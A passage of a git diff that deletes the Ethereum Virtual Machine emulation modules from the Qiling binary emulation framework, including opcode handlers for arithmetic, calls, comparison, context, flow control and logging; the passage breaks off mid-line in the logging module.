a/qiling/arch/evm/vm/instruction.py b/qiling/arch/evm/vm/instruction.py deleted file mode 100644 index 3672bee96..000000000 --- a/qiling/arch/evm/vm/instruction.py +++ /dev/null @@ -1,51 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from ..hooks import QlArchEVMHooks - - -class EVMInsn: - def __init__(self, pc, byte, mnemonic, imm_op, hook_info:QlArchEVMHooks) -> None: - self.pc = pc - self.byte = byte - self.mnemonic = mnemonic - self.imm_op = imm_op - self.hook_info = hook_info - self.callback_list = QlArchEVMHooks() - if mnemonic[:4] == 'PUSH': - self.imm_size = int(mnemonic[4:]) - else: - self.imm_size = 0 - - @property - def is_hook_code(self): - flag = False - for i in self.hook_info.hook_code_list: - if i.end > self.pc >= i.begin or (i.begin==1 and i.end==0): - self.callback_list.hook_code_list.append(i) - flag = True - self.callback_list.hook_code_list = list(dict.fromkeys(self.callback_list.hook_code_list)) - return True if flag else False - - @property - def is_hook_insn(self): - flag = False - for i in self.hook_info.hook_insn_list: - if self.mnemonic == i.intno: - self.callback_list.hook_insn_list.append(i) - flag = True - self.callback_list.hook_insn_list = list(dict.fromkeys(self.callback_list.hook_insn_list)) - return True if flag else False - - @property - def is_hook_addr(self): - flag = False - for k, v in self.hook_info.hook_addr_dict.items(): - if self.pc == k: - self.callback_list.hook_addr_dict[k] = v - flag = True - - return True if flag else False - diff --git a/qiling/arch/evm/vm/interrupt.py b/qiling/arch/evm/vm/interrupt.py deleted file mode 100644 index 531e8cf4d..000000000 --- a/qiling/arch/evm/vm/interrupt.py +++ /dev/null @@ -1,128 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from typing import ( - Optional, -) - -from eth_typing import ( - Address, - Hash32, -) -from eth_utils import ( - encode_hex, -) -from trie.exceptions import ( - MissingTrieNode, -) -from trie.typing import ( - Nibbles, -) -from ..exceptions import ( - PyEVMError, -) - - -class EVMMissingData(PyEVMError): - pass - - -class MissingAccountTrieNode(EVMMissingData, MissingTrieNode): - """ - Raised when a main state trie node is missing from the DB, to get an account RLP - """ - @property - def state_root_hash(self) -> Hash32: - return self.root_hash - - @property - def address_hash(self) -> Hash32: - return self.requested_key - - def __repr__(self) -> str: - return f"MissingAccountTrieNode: {self}" - - def __str__(self) -> str: - superclass_str = EVMMissingData.__str__(self) - return ( - "State trie database is missing node for hash " - f"{encode_hex(self.missing_node_hash)}, which is needed to look up account " - f"with address hash {encode_hex(self.address_hash)} " - f"at root hash {encode_hex(self.state_root_hash)} " - f"-- {superclass_str}" - ) - - -class MissingStorageTrieNode(EVMMissingData, MissingTrieNode): - """ - Raised when a storage trie node is missing from the DB - """ - def __init__( - self, - missing_node_hash: Hash32, - storage_root_hash: Hash32, - requested_key: Hash32, - prefix: Optional[Nibbles], - account_address: Address, - *args: bytes) -> None: - if not isinstance(account_address, bytes): - raise TypeError(f"Account address must be bytes, was: {account_address!r}") - - super().__init__( - missing_node_hash, - storage_root_hash, - requested_key, - prefix, - account_address, - *args, - ) - - @property - def storage_root_hash(self) -> Hash32: - return self.root_hash - - @property - def account_address(self) -> Address: - return self.args[4] - - def __repr__(self) -> str: - return f"MissingStorageTrieNode: {self}" - - def __str__(self) -> str: - superclass_str = EVMMissingData.__str__(self) - return ( - "Storage trie database is missing hash " - f"{encode_hex(self.missing_node_hash)} " - f"needed to look up key {encode_hex(self.requested_key)} " - f"at root hash {encode_hex(self.root_hash)} " - f"in account address {encode_hex(self.account_address)} " - f"-- {superclass_str}" - ) - - -class MissingBytecode(EVMMissingData): - """ - Raised when the bytecode is missing from the database for a known bytecode hash. - """ - def __init__(self, missing_code_hash: Hash32) -> None: - if not isinstance(missing_code_hash, bytes): - raise TypeError(f"Missing code hash must be bytes, was: {missing_code_hash!r}") - - super().__init__(missing_code_hash) - - @property - def missing_code_hash(self) -> Hash32: - return self.args[0] - - def __repr__(self) -> str: - return f"MissingBytecode: {self}" - - def __str__(self) -> str: - superclass_str = EVMMissingData.__str__(self) - return ( - f"Database is missing bytecode for code hash " - f"{encode_hex(self.missing_code_hash)} " - f"-- {superclass_str}" - ) diff --git a/qiling/arch/evm/vm/logic/__init__.py b/qiling/arch/evm/vm/logic/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/qiling/arch/evm/vm/logic/arithmetic.py b/qiling/arch/evm/vm/logic/arithmetic.py deleted file mode 100644 index 104a22402..000000000 --- a/qiling/arch/evm/vm/logic/arithmetic.py +++ /dev/null @@ -1,231 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from eth_utils.toolz import ( - curry, -) - -from ... import constants - -from ..._utils.numeric import ( - unsigned_to_signed, - signed_to_unsigned, - ceil8, -) - -from ...vm.computation import BaseComputation - - -def add(computation: BaseComputation) -> None: - """ - Addition - """ - left, right = computation.stack_pop_ints(2) - - result = (left + right) & constants.UINT_256_MAX - - computation.stack_push_int(result) - - -def addmod(computation: BaseComputation) -> None: - """ - Modulo Addition - """ - left, right, mod = computation.stack_pop_ints(3) - - if mod == 0: - result = 0 - else: - result = (left + right) % mod - - computation.stack_push_int(result) - - -def sub(computation: BaseComputation) -> None: - """ - Subtraction - """ - left, right = computation.stack_pop_ints(2) - - result = (left - right) & constants.UINT_256_MAX - - computation.stack_push_int(result) - - -def mod(computation: BaseComputation) -> None: - """ - Modulo - """ - value, mod = computation.stack_pop_ints(2) - - if mod == 0: - result = 0 - else: - result = value % mod - - computation.stack_push_int(result) - - -def smod(computation: BaseComputation) -> None: - """ - Signed Modulo - """ - value, mod = map( - unsigned_to_signed, - computation.stack_pop_ints(2), - ) - - pos_or_neg = -1 if value < 0 else 1 - - if mod == 0: - result = 0 - else: - result = (abs(value) % abs(mod) * pos_or_neg) & constants.UINT_256_MAX - - computation.stack_push_int(signed_to_unsigned(result)) - - -def mul(computation: BaseComputation) -> None: - """ - Multiplication - """ - left, right = computation.stack_pop_ints(2) - - result = (left * right) & constants.UINT_256_MAX - - computation.stack_push_int(result) - - -def mulmod(computation: BaseComputation) -> None: - """ - Modulo Multiplication - """ - left, right, mod = computation.stack_pop_ints(3) - - if mod == 0: - result = 0 - else: - result = (left * right) % mod - computation.stack_push_int(result) - - -def div(computation: BaseComputation) -> None: - """ - Division - """ - numerator, denominator = computation.stack_pop_ints(2) - - if denominator == 0: - result = 0 - else: - result = (numerator // denominator) & constants.UINT_256_MAX - - computation.stack_push_int(result) - - -def sdiv(computation: BaseComputation) -> None: - """ - Signed Division - """ - numerator, denominator = map( - unsigned_to_signed, - computation.stack_pop_ints(2), - ) - - pos_or_neg = -1 if numerator * denominator < 0 else 1 - - if denominator == 0: - result = 0 - else: - result = (pos_or_neg * (abs(numerator) // abs(denominator))) - - computation.stack_push_int(signed_to_unsigned(result)) - - -@curry -def exp(computation: BaseComputation, gas_per_byte: int) -> None: - """ - Exponentiation - """ - base, exponent = computation.stack_pop_ints(2) - - bit_size = exponent.bit_length() - byte_size = ceil8(bit_size) // 8 - - if exponent == 0: - result = 1 - elif base == 0: - result = 0 - else: - result = pow(base, exponent, constants.UINT_256_CEILING) - - computation.consume_gas( - gas_per_byte * byte_size, - reason="EXP: exponent bytes", - ) - - computation.stack_push_int(result) - - -def signextend(computation: BaseComputation) -> None: - """ - Signed Extend - """ - bits, value = computation.stack_pop_ints(2) - - if bits <= 31: - testbit = bits * 8 + 7 - sign_bit = (1 << testbit) - if value & sign_bit: - result = value | (constants.UINT_256_CEILING - sign_bit) - else: - result = value & (sign_bit - 1) - else: - result = value - - computation.stack_push_int(result) - - -def shl(computation: BaseComputation) -> None: - """ - Bitwise left shift - """ - shift_length, value = computation.stack_pop_ints(2) - - if shift_length >= 256: - result = 0 - else: - result = (value << shift_length) & constants.UINT_256_MAX - - computation.stack_push_int(result) - - -def shr(computation: BaseComputation) -> None: - """ - Bitwise right shift - """ - shift_length, value = computation.stack_pop_ints(2) - - if shift_length >= 256: - result = 0 - else: - result = (value >> shift_length) & constants.UINT_256_MAX - - computation.stack_push_int(result) - - -def sar(computation: BaseComputation) -> None: - """ - Arithmetic bitwise right shift - """ - shift_length, value = computation.stack_pop_ints(2) - value = unsigned_to_signed(value) - - if shift_length >= 256: - result = 0 if value >= 0 else constants.UINT_255_NEGATIVE_ONE - else: - result = (value >> shift_length) & constants.UINT_256_MAX - - computation.stack_push_int(result) diff --git a/qiling/arch/evm/vm/logic/block.py b/qiling/arch/evm/vm/logic/block.py deleted file mode 100644 index 00ab4cf50..000000000 --- a/qiling/arch/evm/vm/logic/block.py +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from ...vm.computation import BaseComputation - - -def blockhash(computation: BaseComputation) -> None: - block_number = computation.stack_pop1_int() - - block_hash = computation.state.get_ancestor_hash(block_number) - - computation.stack_push_bytes(block_hash) - - -def coinbase(computation: BaseComputation) -> None: - computation.stack_push_bytes(computation.state.coinbase) - - -def timestamp(computation: BaseComputation) -> None: - computation.stack_push_int(computation.state.timestamp) - - -def number(computation: BaseComputation) -> None: - computation.stack_push_int(computation.state.block_number) - - -def difficulty(computation: BaseComputation) -> None: - computation.stack_push_int(computation.state.difficulty) - - -def gaslimit(computation: BaseComputation) -> None: - computation.stack_push_int(computation.state.gas_limit) diff --git a/qiling/arch/evm/vm/logic/call.py b/qiling/arch/evm/vm/logic/call.py deleted file mode 100644 index 060cefc4f..000000000 --- a/qiling/arch/evm/vm/logic/call.py +++ /dev/null @@ -1,419 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from abc import ( - ABC, - abstractmethod -) - -from typing import ( - Tuple, -) - -from ... import constants - -from eth_typing import ( - Address, -) - -from ...abc import ( - ComputationAPI, -) -from ...exceptions import ( - OutOfGas, - WriteProtection, -) -from ...vm.opcode import ( - Opcode, -) - -from ..._utils.address import ( - force_bytes_to_address, -) - - -CallParams = Tuple[int, int, Address, Address, Address, int, int, int, int, bool, bool] - - -class BaseCall(Opcode, ABC): - @abstractmethod - def compute_msg_extra_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> int: - raise NotImplementedError("Must be implemented by subclasses") - - @abstractmethod - def get_call_params(self, computation: ComputationAPI) -> CallParams: - raise NotImplementedError("Must be implemented by subclasses") - - def compute_msg_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> Tuple[int, int]: - extra_gas = self.compute_msg_extra_gas(computation, gas, to, value) - total_fee = gas + extra_gas - child_msg_gas = gas + (constants.GAS_CALLSTIPEND if value else 0) - return child_msg_gas, total_fee - - def __call__(self, computation: ComputationAPI) -> None: - computation.consume_gas( - self.gas_cost, - reason=self.mnemonic, - ) - - ( - gas, - value, - to, - sender, - code_address, - memory_input_start_position, - memory_input_size, - memory_output_start_position, - memory_output_size, - should_transfer_value, - is_static, - ) = self.get_call_params(computation) - - computation.extend_memory(memory_input_start_position, memory_input_size) - computation.extend_memory(memory_output_start_position, memory_output_size) - - call_data = computation.memory_read(memory_input_start_position, memory_input_size) - # print(call_data.hex()) - # - # Message gas allocation and fees - # - child_msg_gas, child_msg_gas_fee = self.compute_msg_gas(computation, gas, to, value) - computation.consume_gas(child_msg_gas_fee, reason=self.mnemonic) - - # Pre-call checks - sender_balance = computation.state.get_balance( - computation.msg.storage_address - ) - - insufficient_funds = should_transfer_value and sender_balance < value - stack_too_deep = computation.msg.depth + 1 > constants.STACK_DEPTH_LIMIT - - if insufficient_funds or stack_too_deep: - computation.return_data = b'' - if insufficient_funds: - err_message = f"Insufficient Funds: have: {sender_balance} | need: {value}" - elif stack_too_deep: - err_message = "Stack Limit Reached" - else: - raise Exception("Invariant: Unreachable code path") - - computation.return_gas(child_msg_gas) - computation.stack_push_int(0) - else: - if code_address: - code = computation.state.get_code(code_address) - else: - code = computation.state.get_code(to) - - child_msg_kwargs = { - 'gas': child_msg_gas, - 'value': value, - 'to': to, - 'data': call_data, - 'code': code, - 'code_address': code_address, - 'should_transfer_value': should_transfer_value, - 'is_static': is_static, - } - if sender is not None: - child_msg_kwargs['sender'] = sender - - # TODO: after upgrade to py3.6, use a TypedDict and try again - child_msg = computation.prepare_child_message(**child_msg_kwargs) # type: ignore - if child_msg.code == b'': - if computation.state.has_code_or_nonce(child_msg.sender): - child_msg.code = computation.state.get_code(child_msg.sender) - # child_msg.code_address = child_msg.sender - # child_msg.storage_address = child_msg.sender - # child_msg.to = child_msg.sender - # child_msg.sender = to - child_computation = computation.apply_child_computation(child_msg) - - if child_computation.is_error: - computation.stack_push_int(0) - else: - computation.stack_push_int(1) - - if not child_computation.should_erase_return_data: - actual_output_size = min(memory_output_size, len(child_computation.output)) - computation.memory_write( - memory_output_start_position, - actual_output_size, - child_computation.output[:actual_output_size], - ) - - if child_computation.should_return_gas: - computation.return_gas(child_computation.get_gas_remaining()) - - -class Call(BaseCall): - def compute_msg_extra_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> int: - account_exists = computation.state.account_exists(to) - - transfer_gas_fee = constants.GAS_CALLVALUE if value else 0 - create_gas_fee = constants.GAS_NEWACCOUNT if not account_exists else 0 - return transfer_gas_fee + create_gas_fee - - def get_call_params(self, computation: ComputationAPI) -> CallParams: - gas = computation.stack_pop1_int() - to = force_bytes_to_address(computation.stack_pop1_bytes()) - - ( - value, - memory_input_start_position, - memory_input_size, - memory_output_start_position, - memory_output_size, - ) = computation.stack_pop_ints(5) - - return ( - gas, - value, - to, - None, # sender - None, # code_address - memory_input_start_position, - memory_input_size, - memory_output_start_position, - memory_output_size, - True, # should_transfer_value, - computation.msg.is_static, - ) - - -class CallCode(BaseCall): - def compute_msg_extra_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> int: - return constants.GAS_CALLVALUE if value else 0 - - def get_call_params(self, computation: ComputationAPI) -> CallParams: - gas = computation.stack_pop1_int() - code_address = force_bytes_to_address(computation.stack_pop1_bytes()) - - ( - value, - memory_input_start_position, - memory_input_size, - memory_output_start_position, - memory_output_size, - ) = computation.stack_pop_ints(5) - - to = computation.msg.storage_address - sender = computation.msg.storage_address - - return ( - gas, - value, - to, - sender, - code_address, - memory_input_start_position, - memory_input_size, - memory_output_start_position, - memory_output_size, - True, # should_transfer_value, - computation.msg.is_static, - ) - - -class DelegateCall(BaseCall): - def compute_msg_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> Tuple[int, int]: - return gas, gas - - def compute_msg_extra_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> int: - return 0 - - def get_call_params(self, computation: ComputationAPI) -> CallParams: - gas = computation.stack_pop1_int() - code_address = force_bytes_to_address(computation.stack_pop1_bytes()) - - ( - memory_input_start_position, - memory_input_size, - memory_output_start_position, - memory_output_size, - ) = computation.stack_pop_ints(4) - - to = computation.msg.storage_address - sender = computation.msg.sender - value = computation.msg.value - - return ( - gas, - value, - to, - sender, - code_address, - memory_input_start_position, - memory_input_size, - memory_output_start_position, - memory_output_size, - False, # should_transfer_value, - computation.msg.is_static, - ) - - -# -# EIP150 -# -class CallEIP150(Call): - def compute_msg_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> Tuple[int, int]: - extra_gas = self.compute_msg_extra_gas(computation, gas, to, value) - return compute_eip150_msg_gas( - computation=computation, - gas=gas, - extra_gas=extra_gas, - value=value, - mnemonic=self.mnemonic, - callstipend=constants.GAS_CALLSTIPEND - ) - - -class CallCodeEIP150(CallCode): - def compute_msg_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> Tuple[int, int]: - extra_gas = self.compute_msg_extra_gas(computation, gas, to, value) - return compute_eip150_msg_gas( - computation=computation, - gas=gas, - extra_gas=extra_gas, - value=value, - mnemonic=self.mnemonic, - callstipend=constants.GAS_CALLSTIPEND - ) - - -class DelegateCallEIP150(DelegateCall): - def compute_msg_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> Tuple[int, int]: - extra_gas = self.compute_msg_extra_gas(computation, gas, to, value) - callstipend = 0 - return compute_eip150_msg_gas( - computation=computation, - gas=gas, - extra_gas=extra_gas, - value=value, - mnemonic=self.mnemonic, - callstipend=callstipend - ) - - -def max_child_gas_eip150(gas: int) -> int: - return gas - (gas // 64) - - -def compute_eip150_msg_gas(*, - computation: ComputationAPI, - gas: int, - extra_gas: int, - value: int, - mnemonic: str, - callstipend: int) -> Tuple[int, int]: - if computation.get_gas_remaining() < extra_gas: - # It feels wrong to raise an OutOfGas exception outside of GasMeter, - # but I don't see an easy way around it. - raise OutOfGas( - f"Out of gas: Needed {extra_gas}" - f" - Remaining {computation.get_gas_remaining()}" - f" - Reason: {mnemonic}" - ) - gas = min( - gas, - max_child_gas_eip150(computation.get_gas_remaining() - extra_gas)) - total_fee = gas + extra_gas - child_msg_gas = gas + (callstipend if value else 0) - return child_msg_gas, total_fee - - -# -# EIP161 -# -class CallEIP161(CallEIP150): - def compute_msg_extra_gas(self, - computation: ComputationAPI, - gas: int, - to: Address, - value: int) -> int: - account_is_dead = ( - not computation.state.account_exists(to) - or computation.state.account_is_empty(to) - ) - - transfer_gas_fee = constants.GAS_CALLVALUE if value else 0 - create_gas_fee = constants.GAS_NEWACCOUNT if (account_is_dead and value) else 0 - return transfer_gas_fee + create_gas_fee - - -# -# Byzantium -# -class StaticCall(CallEIP161): - def get_call_params(self, computation: ComputationAPI) -> CallParams: - gas = computation.stack_pop1_int() - to = force_bytes_to_address(computation.stack_pop1_bytes()) - - ( - memory_input_start_position, - memory_input_size, - memory_output_start_position, - memory_output_size, - ) = computation.stack_pop_ints(4) - - return ( - gas, - 0, # value - to, - None, # sender - None, # code_address - memory_input_start_position, - memory_input_size, - memory_output_start_position, - memory_output_size, - False, # should_transfer_value, - True, # is_static - ) - - -class CallByzantium(CallEIP161): - def get_call_params(self, computation: ComputationAPI) -> CallParams: - call_params = super().get_call_params(computation) - value = call_params[1] - if computation.msg.is_static and value != 0: - raise WriteProtection("Cannot modify state while inside of a STATICCALL context") - return call_params diff --git a/qiling/arch/evm/vm/logic/comparison.py b/qiling/arch/evm/vm/logic/comparison.py deleted file mode 100644 index 3bf6dc517..000000000 --- a/qiling/arch/evm/vm/logic/comparison.py +++ /dev/null @@ -1,161 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from ... import constants - -from ..._utils.numeric import ( - signed_to_unsigned, - unsigned_to_signed, -) - -from ...vm.computation import BaseComputation - - -def lt(computation: BaseComputation) -> None: - """ - Lesser Comparison - """ - left, right = computation.stack_pop_ints(2) - - if left < right: - result = 1 - else: - result = 0 - - computation.stack_push_int(result) - - -def gt(computation: BaseComputation) -> None: - """ - Greater Comparison - """ - left, right = computation.stack_pop_ints(2) - - if left > right: - result = 1 - else: - result = 0 - - computation.stack_push_int(result) - - -def slt(computation: BaseComputation) -> None: - """ - Signed Lesser Comparison - """ - left, right = map( - unsigned_to_signed, - computation.stack_pop_ints(2), - ) - - if left < right: - result = 1 - else: - result = 0 - - computation.stack_push_int(signed_to_unsigned(result)) - - -def sgt(computation: BaseComputation) -> None: - """ - Signed Greater Comparison - """ - left, right = map( - unsigned_to_signed, - computation.stack_pop_ints(2), - ) - - if left > right: - result = 1 - else: - result = 0 - - computation.stack_push_int(signed_to_unsigned(result)) - - -def eq(computation: BaseComputation) -> None: - """ - Equality - """ - left, right = computation.stack_pop_ints(2) - - if left == right: - result = 1 - else: - result = 0 - - computation.stack_push_int(result) - - -def iszero(computation: BaseComputation) -> None: - """ - Not - """ - value = computation.stack_pop1_int() - - if value == 0: - result = 1 - else: - result = 0 - - computation.stack_push_int(result) - - -def and_op(computation: BaseComputation) -> None: - """ - Bitwise And - """ - left, right = computation.stack_pop_ints(2) - - result = left & right - - computation.stack_push_int(result) - - -def or_op(computation: BaseComputation) -> None: - """ - Bitwise Or - """ - left, right = computation.stack_pop_ints(2) - - result = left | right - - computation.stack_push_int(result) - - -def xor(computation: BaseComputation) -> None: - """ - Bitwise XOr - """ - left, right = computation.stack_pop_ints(2) - - result = left ^ right - - computation.stack_push_int(result) - - -def not_op(computation: BaseComputation) -> None: - """ - Not - """ - value = computation.stack_pop1_int() - - result = constants.UINT_256_MAX - value - - computation.stack_push_int(result) - - -def byte_op(computation: BaseComputation) -> None: - """ - Bitwise And - """ - position, value = computation.stack_pop_ints(2) - - if position >= 32: - result = 0 - else: - result = (value // pow(256, 31 - position)) % 256 - - computation.stack_push_int(result) diff --git a/qiling/arch/evm/vm/logic/context.py b/qiling/arch/evm/vm/logic/context.py deleted file mode 100644 index 1376cf8db..000000000 --- a/qiling/arch/evm/vm/logic/context.py +++ /dev/null @@ -1,210 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from eth_typing import ( - Address, -) - -from ... import constants - -from ...exceptions import ( - OutOfBoundsRead, -) - -from ..._utils.address import ( - force_bytes_to_address, -) -from ..._utils.numeric import ( - ceil32, -) - -from ...vm.computation import BaseComputation - - -def balance(computation: BaseComputation) -> None: - addr = force_bytes_to_address(computation.stack_pop1_bytes()) - _push_balance_of_address(addr, computation) - - -def selfbalance(computation: BaseComputation) -> None: - _push_balance_of_address(computation.msg.storage_address, computation) - - -def _push_balance_of_address(address: Address, computation: BaseComputation) -> None: - balance = computation.state.get_balance(address) - computation.stack_push_int(balance) - - -def origin(computation: BaseComputation) -> None: - computation.stack_push_bytes(computation.transaction_context.origin) - - -def address(computation: BaseComputation) -> None: - computation.stack_push_bytes(computation.msg.storage_address) - - -def caller(computation: BaseComputation) -> None: - computation.stack_push_bytes(computation.msg.sender) - - -def callvalue(computation: BaseComputation) -> None: - computation.stack_push_int(computation.msg.value) - - -def calldataload(computation: BaseComputation) -> None: - """ - Load call data into memory. - """ - start_position = computation.stack_pop1_int() - - value = computation.msg.data_as_bytes[start_position:start_position + 32] - padded_value = value.ljust(32, b'\x00') - normalized_value = padded_value.lstrip(b'\x00') - - computation.stack_push_bytes(normalized_value) - - -def calldatasize(computation: BaseComputation) -> None: - size = len(computation.msg.data) - computation.stack_push_int(size) - - -def calldatacopy(computation: BaseComputation) -> None: - ( - mem_start_position, - calldata_start_position, - size, - ) = computation.stack_pop_ints(3) - - computation.extend_memory(mem_start_position, size) - - word_count = ceil32(size) // 32 - copy_gas_cost = word_count * constants.GAS_COPY - - computation.consume_gas(copy_gas_cost, reason="CALLDATACOPY fee") - - value = computation.msg.data_as_bytes[ - calldata_start_position: calldata_start_position + size - ] - padded_value = value.ljust(size, b'\x00') - - computation.memory_write(mem_start_position, size, padded_value) - - -def chain_id(computation: BaseComputation) -> None: - computation.stack_push_int(computation.state.execution_context.chain_id) - - -def codesize(computation: BaseComputation) -> None: - size = len(computation.code) - computation.stack_push_int(size) - - -def codecopy(computation: BaseComputation) -> None: - ( - mem_start_position, - code_start_position, - size, - ) = computation.stack_pop_ints(3) - - computation.extend_memory(mem_start_position, size) - - word_count = ceil32(size) // 32 - copy_gas_cost = constants.GAS_COPY * word_count - - computation.consume_gas( - copy_gas_cost, - reason="CODECOPY: word gas cost", - ) - - with computation.code.seek(code_start_position): - code_bytes = computation.code.read(size) - - padded_code_bytes = code_bytes.ljust(size, b'\x00') - - computation.memory_write(mem_start_position, size, padded_code_bytes) - - -def gasprice(computation: BaseComputation) -> None: - computation.stack_push_int(computation.transaction_context.gas_price) - - -def extcodesize(computation: BaseComputation) -> None: - account = force_bytes_to_address(computation.stack_pop1_bytes()) - code_size = len(computation.state.get_code(account)) - - computation.stack_push_int(code_size) - - -def extcodecopy(computation: BaseComputation) -> None: - account = force_bytes_to_address(computation.stack_pop1_bytes()) - ( - mem_start_position, - code_start_position, - size, - ) = computation.stack_pop_ints(3) - - computation.extend_memory(mem_start_position, size) - - word_count = ceil32(size) // 32 - copy_gas_cost = constants.GAS_COPY * word_count - - computation.consume_gas( - copy_gas_cost, - reason='EXTCODECOPY: word gas cost', - ) - - code = computation.state.get_code(account) - - code_bytes = code[code_start_position:code_start_position + size] - padded_code_bytes = code_bytes.ljust(size, b'\x00') - - computation.memory_write(mem_start_position, size, padded_code_bytes) - - -def extcodehash(computation: BaseComputation) -> None: - """ - Return the code hash for a given address. - EIP: https://github.com/ethereum/EIPs/blob/master/EIPS/eip-1052.md - """ - account = force_bytes_to_address(computation.stack_pop1_bytes()) - state = computation.state - - if state.account_is_empty(account): - computation.stack_push_bytes(constants.NULL_BYTE) - else: - computation.stack_push_bytes(state.get_code_hash(account)) - - -def returndatasize(computation: BaseComputation) -> None: - size = len(computation.return_data) - computation.stack_push_int(size) - - -def returndatacopy(computation: BaseComputation) -> None: - ( - mem_start_position, - returndata_start_position, - size, - ) = computation.stack_pop_ints(3) - - if returndata_start_position + size > len(computation.return_data): - raise OutOfBoundsRead( - "Return data length is not sufficient to satisfy request. Asked " - f"for data from index {returndata_start_position} " - f"to {returndata_start_position + size}. " - f"Return data is {len(computation.return_data)} bytes in length." - ) - - computation.extend_memory(mem_start_position, size) - - word_count = ceil32(size) // 32 - copy_gas_cost = word_count * constants.GAS_COPY - - computation.consume_gas(copy_gas_cost, reason="RETURNDATACOPY fee") - - value = computation.return_data[returndata_start_position: returndata_start_position + size] - - computation.memory_write(mem_start_position, size, value) diff --git a/qiling/arch/evm/vm/logic/duplication.py b/qiling/arch/evm/vm/logic/duplication.py deleted file mode 100644 index 103938a0c..000000000 --- a/qiling/arch/evm/vm/logic/duplication.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import functools - -from ...vm.computation import BaseComputation - - -def dup_XX(computation: BaseComputation, position: int) -> None: - """ - Stack item duplication. - """ - computation.stack_dup(position) - - -dup1 = functools.partial(dup_XX, position=1) -dup2 = functools.partial(dup_XX, position=2) -dup3 = functools.partial(dup_XX, position=3) -dup4 = functools.partial(dup_XX, position=4) -dup5 = functools.partial(dup_XX, position=5) -dup6 = functools.partial(dup_XX, position=6) -dup7 = functools.partial(dup_XX, position=7) -dup8 = functools.partial(dup_XX, position=8) -dup9 = functools.partial(dup_XX, position=9) -dup10 = functools.partial(dup_XX, position=10) -dup11 = functools.partial(dup_XX, position=11) -dup12 = functools.partial(dup_XX, position=12) -dup13 = functools.partial(dup_XX, position=13) -dup14 = functools.partial(dup_XX, position=14) -dup15 = functools.partial(dup_XX, position=15) -dup16 = functools.partial(dup_XX, position=16) diff --git a/qiling/arch/evm/vm/logic/flow.py b/qiling/arch/evm/vm/logic/flow.py deleted file mode 100644 index 7adc08f45..000000000 --- a/qiling/arch/evm/vm/logic/flow.py +++ /dev/null @@ -1,64 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from ...exceptions import ( - InvalidJumpDestination, - InvalidInstruction, - Halt, -) - -from ...vm.computation import BaseComputation -from ...vm.opcode_values import ( - JUMPDEST, -) - - -def stop(computation: BaseComputation) -> None: - raise Halt('STOP') - - -def jump(computation: BaseComputation) -> None: - jump_dest = computation.stack_pop1_int() - - computation.code.program_counter = jump_dest - - next_opcode = computation.code.peek() - - if next_opcode != JUMPDEST: - raise InvalidJumpDestination("Invalid Jump Destination") - - if not computation.code.is_valid_opcode(jump_dest): - raise InvalidInstruction("Jump resulted in invalid instruction") - - -def jumpi(computation: BaseComputation) -> None: - jump_dest, check_value = computation.stack_pop_ints(2) - - if check_value: - computation.code.program_counter = jump_dest - - next_opcode = computation.code.peek() - - if next_opcode != JUMPDEST: - raise InvalidJumpDestination("Invalid Jump Destination") - - if not computation.code.is_valid_opcode(jump_dest): - raise InvalidInstruction("Jump resulted in invalid instruction") - - -def jumpdest(computation: BaseComputation) -> None: - pass - - -def program_counter(computation: BaseComputation) -> None: - pc = max(computation.code.program_counter - 1, 0) - - computation.stack_push_int(pc) - - -def gas(computation: BaseComputation) -> None: - gas_remaining = computation.get_gas_remaining() - - computation.stack_push_int(gas_remaining) diff --git a/qiling/arch/evm/vm/logic/invalid.py b/qiling/arch/evm/vm/logic/invalid.py deleted file mode 100644 index 0da60a47c..000000000 --- a/qiling/arch/evm/vm/logic/invalid.py +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from ...abc import ComputationAPI -from ...exceptions import InvalidInstruction -from ...vm.opcode import Opcode - - -class InvalidOpcode(Opcode): - mnemonic = "INVALID" - gas_cost = 0 - - def __init__(self, value: int) -> None: - self.value = value - super().__init__() - - def __call__(self, computation: ComputationAPI) -> None: - raise InvalidInstruction( - f"Invalid opcode 0x{self.value:x} @ {computation.code.program_counter - 1}" - ) diff --git a/qiling/arch/evm/vm/logic/logging.py b/qiling/arch/evm/vm/logic/logging.py deleted file mode 100644 index 627ba7b97..000000000 --- a/qiling/arch/evm/vm/logic/logging.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import functools -from typing import Tuple -from ... import constants - -from ...vm.computation import BaseComputation - - -def log_XX(computation: BaseComputation, topic_count: int) -> None: - if topic_count < 0 or topic_count > 4: - raise TypeError("Invalid log topic size. Must be 0, 1, 2, 3, or 4") - - mem_start_position, size = computation.stack_pop_ints(2) - - if not topic_count: - topics: Tuple[int, ...] = () - elif topic_count > 1: - topics = computation.stack_pop_ints(topic_count) - else: - topics = (computation.stack_pop1_int(), ) - - data_gas_cost = 